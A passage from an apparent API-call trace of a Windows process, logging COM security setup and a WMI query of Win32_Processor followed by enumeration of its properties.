Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1ec | out: ppvObject=0x19f1ec*=0x5af530) returned 0x0 [0184.572] WbemLocator:IUnknown:QueryInterface (in: This=0x5af530, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x5af50c) returned 0x0 [0184.573] WbemLocator:IClientSecurity:SetBlanket (This=0x5af50c, pProxy=0x5af530, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0184.573] WbemLocator:IUnknown:Release (This=0x5af50c) returned 0x3 [0184.573] WbemLocator:IUnknown:Release (This=0x5af530) returned 0x2 [0184.573] CoTaskMemFree (pv=0x598ee8) [0184.573] WbemLocator:IUnknown:Release (This=0x5af530) returned 0x1 [0184.573] SysStringLen (param_1=0x0) returned 0x0 [0184.573] CoGetContextToken (in: pToken=0x19f1b8 | out: pToken=0x19f1b8) returned 0x0 [0184.573] CoGetContextToken (in: pToken=0x19f118 | out: pToken=0x19f118) returned 0x0 [0184.573] WbemLocator:IUnknown:QueryInterface (in: This=0x5af530, riid=0x19f1e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19f1e4 | out: ppvObject=0x19f1e4*=0x57d280) returned 0x0 [0184.574] WbemLocator:IUnknown:AddRef (This=0x57d280) returned 0x3 [0184.574] WbemLocator:IUnknown:Release (This=0x57d280) returned 0x2 [0184.574] CoGetContextToken (in: pToken=0x19f178 | out: pToken=0x19f178) returned 0x0 [0184.574] WbemLocator:IUnknown:AddRef (This=0x57d280) returned 0x3 [0184.574] WbemLocator:IUnknown:QueryInterface (in: This=0x57d280, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1f8 | out: ppvObject=0x19f1f8*=0x5af50c) returned 0x0 [0184.574] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5af50c, pProxy=0x57d280, pAuthnSvc=0x19f248, pAuthzSvc=0x19f244, pServerPrincName=0x19f23c, pAuthnLevel=0x19f240, pImpLevel=0x19f230, pAuthInfo=0x19f234, pCapabilites=0x19f238 | out: pAuthnSvc=0x19f248*=0xa, pAuthzSvc=0x19f244*=0x0, pServerPrincName=0x19f23c, pAuthnLevel=0x19f240*=0x6, pImpLevel=0x19f230*=0x2, pAuthInfo=0x19f234, pCapabilites=0x19f238*=0x1) returned 0x0 [0184.574] WbemLocator:IUnknown:Release (This=0x5af50c) returned 0x3 [0184.574] WbemLocator:IUnknown:QueryInterface (in: This=0x57d280, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1ec | out: ppvObject=0x19f1ec*=0x5af530) returned 0x0 [0184.574] WbemLocator:IUnknown:QueryInterface (in: This=0x57d280, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x5af50c) returned 0x0 [0184.574] WbemLocator:IClientSecurity:SetBlanket (This=0x5af50c, pProxy=0x57d280, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0184.574] WbemLocator:IUnknown:Release (This=0x5af50c) returned 0x4 [0184.574] WbemLocator:IUnknown:Release (This=0x5af530) returned 0x3 [0184.574] CoTaskMemFree (pv=0x598f78) [0184.575] WbemLocator:IUnknown:Release (This=0x57d280) returned 0x2 [0184.575] SysStringLen (param_1=0x0) returned 0x0 [0184.575] CoGetContextToken (in: pToken=0x19f0f8 | out: pToken=0x19f0f8) returned 0x0 [0184.575] WbemLocator:IUnknown:AddRef (This=0x57d280) returned 0x3 [0184.575] IWbemServices:ExecQuery (in: This=0x57d280, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Processor", lFlags=16, pCtx=0x0, ppEnum=0x19f308 | out: ppEnum=0x19f308*=0x599df8) returned 0x0 [0184.666] IUnknown:QueryInterface (in: This=0x599df8, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f164 | out: ppvObject=0x19f164*=0x599dfc) returned 0x0 [0184.666] IClientSecurity:QueryBlanket (in: This=0x599dfc, pProxy=0x599df8, pAuthnSvc=0x19f1b4, pAuthzSvc=0x19f1b0, pServerPrincName=0x19f1a8, pAuthnLevel=0x19f1ac, pImpLevel=0x19f19c, pAuthInfo=0x19f1a0, pCapabilites=0x19f1a4 | out: pAuthnSvc=0x19f1b4*=0xa, pAuthzSvc=0x19f1b0*=0x0, pServerPrincName=0x19f1a8, pAuthnLevel=0x19f1ac*=0x6, pImpLevel=0x19f19c*=0x2, pAuthInfo=0x19f1a0, pCapabilites=0x19f1a4*=0x1) returned 0x0 [0184.666] IUnknown:Release (This=0x599dfc) returned 0x1 [0184.666] IUnknown:QueryInterface (in: This=0x599df8, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f158 | out: ppvObject=0x19f158*=0x5af630) returned 0x0 [0184.667] IUnknown:QueryInterface (in: This=0x599df8, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f144 | out: ppvObject=0x19f144*=0x599dfc) returned 0x0 [0184.667] IClientSecurity:SetBlanket (This=0x599dfc, pProxy=0x599df8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0184.669] IUnknown:Release (This=0x599dfc) returned 0x2 [0184.669] WbemLocator:IUnknown:Release (This=0x5af630) returned 0x1 [0184.669] CoTaskMemFree (pv=0x598ee8) [0184.670] IUnknown:QueryInterface (in: This=0x599df8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed50 | out: ppvObject=0x19ed50*=0x5af630) returned 0x0 [0184.670] WbemLocator:IUnknown:QueryInterface (in: This=0x5af630, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ed0c | out: ppvObject=0x19ed0c*=0x0) returned 0x80004002 [0184.670] WbemLocator:IUnknown:QueryInterface (in: This=0x5af630, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19eb2c | out: ppvObject=0x19eb2c*=0x0) returned 0x80004002 [0184.671] IUnknown:QueryInterface (in: This=0x599df8, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e904 | out: ppvObject=0x19e904*=0x0) returned 0x80004002 [0184.671] WbemLocator:IUnknown:AddRef (This=0x5af630) returned 0x3 [0184.671] WbemLocator:IUnknown:QueryInterface (in: This=0x5af630, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e664 | out: ppvObject=0x19e664*=0x0) returned 0x80004002 [0184.671] WbemLocator:IUnknown:QueryInterface (in: This=0x5af630, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e614 | out: ppvObject=0x19e614*=0x0) returned 0x80004002 [0184.671] WbemLocator:IUnknown:QueryInterface (in: This=0x5af630, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e620 | out: ppvObject=0x19e620*=0x5af58c) returned 0x0 [0184.672] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5af58c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e628 | out: pCid=0x19e628*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0184.672] WbemLocator:IUnknown:Release (This=0x5af58c) returned 0x3 [0184.672] CoGetContextToken (in: pToken=0x19e680 | out: pToken=0x19e680) returned 0x0 [0184.672] CoGetContextToken (in: pToken=0x19ea88 | out: pToken=0x19ea88) returned 0x0 [0184.672] WbemLocator:IUnknown:QueryInterface (in: This=0x5af630, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eb14 | out: ppvObject=0x19eb14*=0x5af614) returned 0x0 [0184.672] WbemLocator:IRpcOptions:Query (in: This=0x5af614, pPrx=0x5af630, dwProperty=2, pdwValue=0x19eb20 | out: pdwValue=0x19eb20) returned 0x80004002 [0184.672] WbemLocator:IUnknown:Release (This=0x5af614) returned 0x3 [0184.672] WbemLocator:IUnknown:Release (This=0x5af630) returned 0x2 [0184.672] CoGetContextToken (in: pToken=0x19f060 | out: pToken=0x19f060) returned 0x0 [0184.672] CoGetContextToken (in: pToken=0x19efc0 | out: pToken=0x19efc0) returned 0x0 [0184.672] WbemLocator:IUnknown:QueryInterface (in: This=0x5af630, riid=0x19f090*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f08c | out: ppvObject=0x19f08c*=0x599df8) returned 0x0 [0184.672] IUnknown:AddRef (This=0x599df8) returned 0x4 [0184.672] IUnknown:Release (This=0x599df8) returned 0x3 [0184.672] IUnknown:Release (This=0x599df8) returned 0x2 [0184.672] WbemLocator:IUnknown:Release (This=0x57d280) returned 0x2 [0184.672] SysStringLen (param_1=0x0) returned 0x0 [0184.672] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f354 | out: puCount=0x19f354*=0x2) returned 0x0 [0184.672] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f350*=0x0, pszText=0x0 | out: puBuffLength=0x19f350*=0xf, pszText=0x0) returned 0x0 [0184.672] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f350*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f350*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0184.672] CoGetContextToken (in: pToken=0x19f1a0 | out: pToken=0x19f1a0) returned 0x0 [0184.673] IUnknown:AddRef (This=0x599df8) returned 0x3 [0184.673] IEnumWbemClassObject:Clone (in: This=0x599df8, ppEnum=0x19f360 | out: ppEnum=0x19f360*=0x599d30) returned 0x0 [0184.674] IUnknown:QueryInterface (in: This=0x599d30, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f21c | out: ppvObject=0x19f21c*=0x599d34) returned 0x0 [0184.674] IClientSecurity:QueryBlanket (in: This=0x599d34, pProxy=0x599d30, pAuthnSvc=0x19f26c, pAuthzSvc=0x19f268, pServerPrincName=0x19f260, pAuthnLevel=0x19f264, pImpLevel=0x19f254, pAuthInfo=0x19f258, pCapabilites=0x19f25c | out: pAuthnSvc=0x19f26c*=0xa, pAuthzSvc=0x19f268*=0x0, pServerPrincName=0x19f260, pAuthnLevel=0x19f264*=0x6, pImpLevel=0x19f254*=0x2, pAuthInfo=0x19f258, pCapabilites=0x19f25c*=0x1) returned 0x0 [0184.674] IUnknown:Release (This=0x599d34) returned 0x1 [0184.674] IUnknown:QueryInterface (in: This=0x599d30, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f210 | out: ppvObject=0x19f210*=0x5af430) returned 0x0 [0184.674] IUnknown:QueryInterface (in: This=0x599d30, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1fc | out: ppvObject=0x19f1fc*=0x599d34) returned 0x0 [0184.674] IClientSecurity:SetBlanket (This=0x599d34, pProxy=0x599d30, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0184.801] IUnknown:Release (This=0x599d34) returned 0x2 [0184.801] WbemLocator:IUnknown:Release (This=0x5af430) returned 0x1 [0184.801] CoTaskMemFree (pv=0x598df8) [0184.801] IUnknown:QueryInterface (in: This=0x599d30, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19edf8 | out: ppvObject=0x19edf8*=0x5af430) returned 0x0 [0184.802] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19edb4 | out: ppvObject=0x19edb4*=0x0) returned 0x80004002 [0184.804] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ebd4 | out: ppvObject=0x19ebd4*=0x0) returned 0x80004002 [0184.805] IUnknown:QueryInterface (in: This=0x599d30, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e9ac | out: ppvObject=0x19e9ac*=0x0) returned 0x80004002 [0184.805] WbemLocator:IUnknown:AddRef (This=0x5af430) returned 0x3 [0184.805] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e70c | out: ppvObject=0x19e70c*=0x0) returned 0x80004002 [0184.805] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e6bc | out: ppvObject=0x19e6bc*=0x0) returned 0x80004002 [0184.805] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e6c8 | out: ppvObject=0x19e6c8*=0x5af38c) returned 0x0 [0184.806] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5af38c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e6d0 | out: pCid=0x19e6d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0184.806] WbemLocator:IUnknown:Release (This=0x5af38c) returned 0x3 [0184.806] CoGetContextToken (in: pToken=0x19e728 | out: pToken=0x19e728) returned 0x0 [0184.806] CoGetContextToken (in: pToken=0x19eb30 | out: pToken=0x19eb30) returned 0x0 [0184.806] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebbc | out: ppvObject=0x19ebbc*=0x5af414) returned 0x0 [0184.806] WbemLocator:IRpcOptions:Query (in: This=0x5af414, pPrx=0x5af430, dwProperty=2, pdwValue=0x19ebc8 | out: pdwValue=0x19ebc8) returned 0x80004002 [0184.806] WbemLocator:IUnknown:Release (This=0x5af414) returned 0x3 [0184.806] WbemLocator:IUnknown:Release (This=0x5af430) returned 0x2 [0184.806] CoGetContextToken (in: pToken=0x19f108 | out: pToken=0x19f108) returned 0x0 [0184.806] CoGetContextToken (in: pToken=0x19f068 | out: pToken=0x19f068) returned 0x0 [0184.806] WbemLocator:IUnknown:QueryInterface (in: This=0x5af430, riid=0x19f138*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f134 | out: ppvObject=0x19f134*=0x599d30) returned 0x0 [0184.806] IUnknown:AddRef (This=0x599d30) returned 0x4 [0184.806] IUnknown:Release (This=0x599d30) returned 0x3 [0184.806] IUnknown:Release (This=0x599d30) returned 0x2 [0184.806] IUnknown:Release (This=0x599df8) returned 0x2 [0184.807] SysStringLen (param_1=0x0) returned 0x0 [0184.807] IEnumWbemClassObject:Reset (This=0x599d30) returned 0x0 [0184.807] CoTaskMemAlloc (cb=0x4) returned 0x596ee8 [0184.807] IEnumWbemClassObject:Next (in: This=0x599d30, lTimeout=-1, uCount=0x1, apObjects=0x596ee8, puReturned=0x231466c | out: apObjects=0x596ee8*=0x5d4470, puReturned=0x231466c*=0x1) returned 0x0 [0185.884] IUnknown:QueryInterface (in: This=0x5d4470, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9b8 | out: ppvObject=0x19e9b8*=0x5d4470) returned 0x0 [0185.884] IUnknown:QueryInterface (in: This=0x5d4470, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e974 | out: ppvObject=0x19e974*=0x0) returned 0x80004002 [0185.884] IUnknown:QueryInterface (in: This=0x5d4470, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e794 | out: ppvObject=0x19e794*=0x0) returned 0x80004002 [0185.884] IUnknown:QueryInterface (in: This=0x5d4470, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e56c | out: ppvObject=0x19e56c*=0x0) returned 0x80004002 [0185.885] IUnknown:AddRef (This=0x5d4470) returned 0x3 [0185.885] IUnknown:QueryInterface (in: This=0x5d4470, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2cc | out: ppvObject=0x19e2cc*=0x0) returned 0x80004002 [0185.885] IUnknown:QueryInterface (in: This=0x5d4470, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e27c | out: ppvObject=0x19e27c*=0x0) returned 0x80004002 [0185.885] IUnknown:QueryInterface (in: This=0x5d4470, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e288 | out: ppvObject=0x19e288*=0x5d4474) returned 0x0 [0185.885] IMarshal:GetUnmarshalClass (in: This=0x5d4474, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e290 | out: pCid=0x19e290*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0185.885] IUnknown:Release (This=0x5d4474) returned 0x3 [0185.885] CoGetContextToken (in: pToken=0x19e2e8 | out: pToken=0x19e2e8) returned 0x0 [0185.885] CoGetContextToken (in: pToken=0x19e6f0 | out: pToken=0x19e6f0) returned 0x0 [0185.885] IUnknown:QueryInterface (in: This=0x5d4470, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e77c | out: ppvObject=0x19e77c*=0x0) returned 0x80004002 [0185.885] IUnknown:Release (This=0x5d4470) returned 0x2 [0185.885] CoGetContextToken (in: pToken=0x19ecc8 | out: pToken=0x19ecc8) returned 0x0 [0185.885] CoGetContextToken (in: pToken=0x19ec28 | out: pToken=0x19ec28) returned 0x0 [0185.885] IUnknown:QueryInterface (in: This=0x5d4470, riid=0x19ecf8*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ecf4 | out: ppvObject=0x19ecf4*=0x5d4470) returned 0x0 [0185.885] IUnknown:AddRef (This=0x5d4470) returned 0x4 [0185.885] IUnknown:Release (This=0x5d4470) returned 0x3 [0185.886] IUnknown:Release (This=0x5d4470) returned 0x2 [0185.886] CoTaskMemFree (pv=0x596ee8) [0185.886] CoGetContextToken (in: pToken=0x19f040 | out: pToken=0x19f040) returned 0x0 [0185.886] IUnknown:AddRef (This=0x5d4470) returned 0x3 [0185.886] IWbemClassObject:Get (in: This=0x5d4470, wszName="__GENUS", lFlags=0, pVal=0x19f350*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f3d0*=0, plFlavor=0x19f3cc*=0 | out: pVal=0x19f350*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f3d0*=3, plFlavor=0x19f3cc*=64) returned 0x0 [0185.886] IWbemClassObject:Get (in: This=0x5d4470, wszName="__PATH", lFlags=0, pVal=0x19f334*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f3b8*=0, plFlavor=0x19f3b4*=0 | out: pVal=0x19f334*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"", varVal2=0x0), pType=0x19f3b8*=8, plFlavor=0x19f3b4*=64) returned 0x0 [0185.886] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x66 [0185.886] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x66 [0185.886] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x444 [0185.886] SetEvent (hEvent=0x3b4) returned 1 [0185.887] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f30c*=0x444, lpdwindex=0x19f12c | out: lpdwindex=0x19f12c) returned 0x0 [0185.897] CoGetContextToken (in: pToken=0x19f1d8 | out: pToken=0x19f1d8) returned 0x0 [0185.897] CoGetContextToken (in: pToken=0x19f138 | out: pToken=0x19f138) returned 0x0 [0185.897] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x19f208*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f204 | out: ppvObject=0x19f204*=0x5942e0) returned 0x0 [0185.897] WbemDefPath:IUnknown:AddRef (This=0x5942e0) returned 0x3 [0185.897] WbemDefPath:IUnknown:Release (This=0x5942e0) returned 0x2 [0185.897] WbemDefPath:IWbemPath:SetText (This=0x5942e0, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x0 [0185.897] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f38c | out: puCount=0x19f38c*=0x2) returned 0x0 [0185.897] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f388*=0x0, pszText=0x0 | out: puBuffLength=0x19f388*=0xf, pszText=0x0) returned 0x0 [0185.897] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f388*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f388*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0185.916] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f35c | out: puCount=0x19f35c*=0x2) returned 0x0 [0185.916] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f358*=0x0, pszText=0x0 | out: puBuffLength=0x19f358*=0xf, pszText=0x0) returned 0x0 [0185.916] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f358*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f358*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0185.916] IWbemClassObject:Get (in: This=0x5d4470, wszName="Name", lFlags=0, pVal=0x19f358*(varType=0x0, 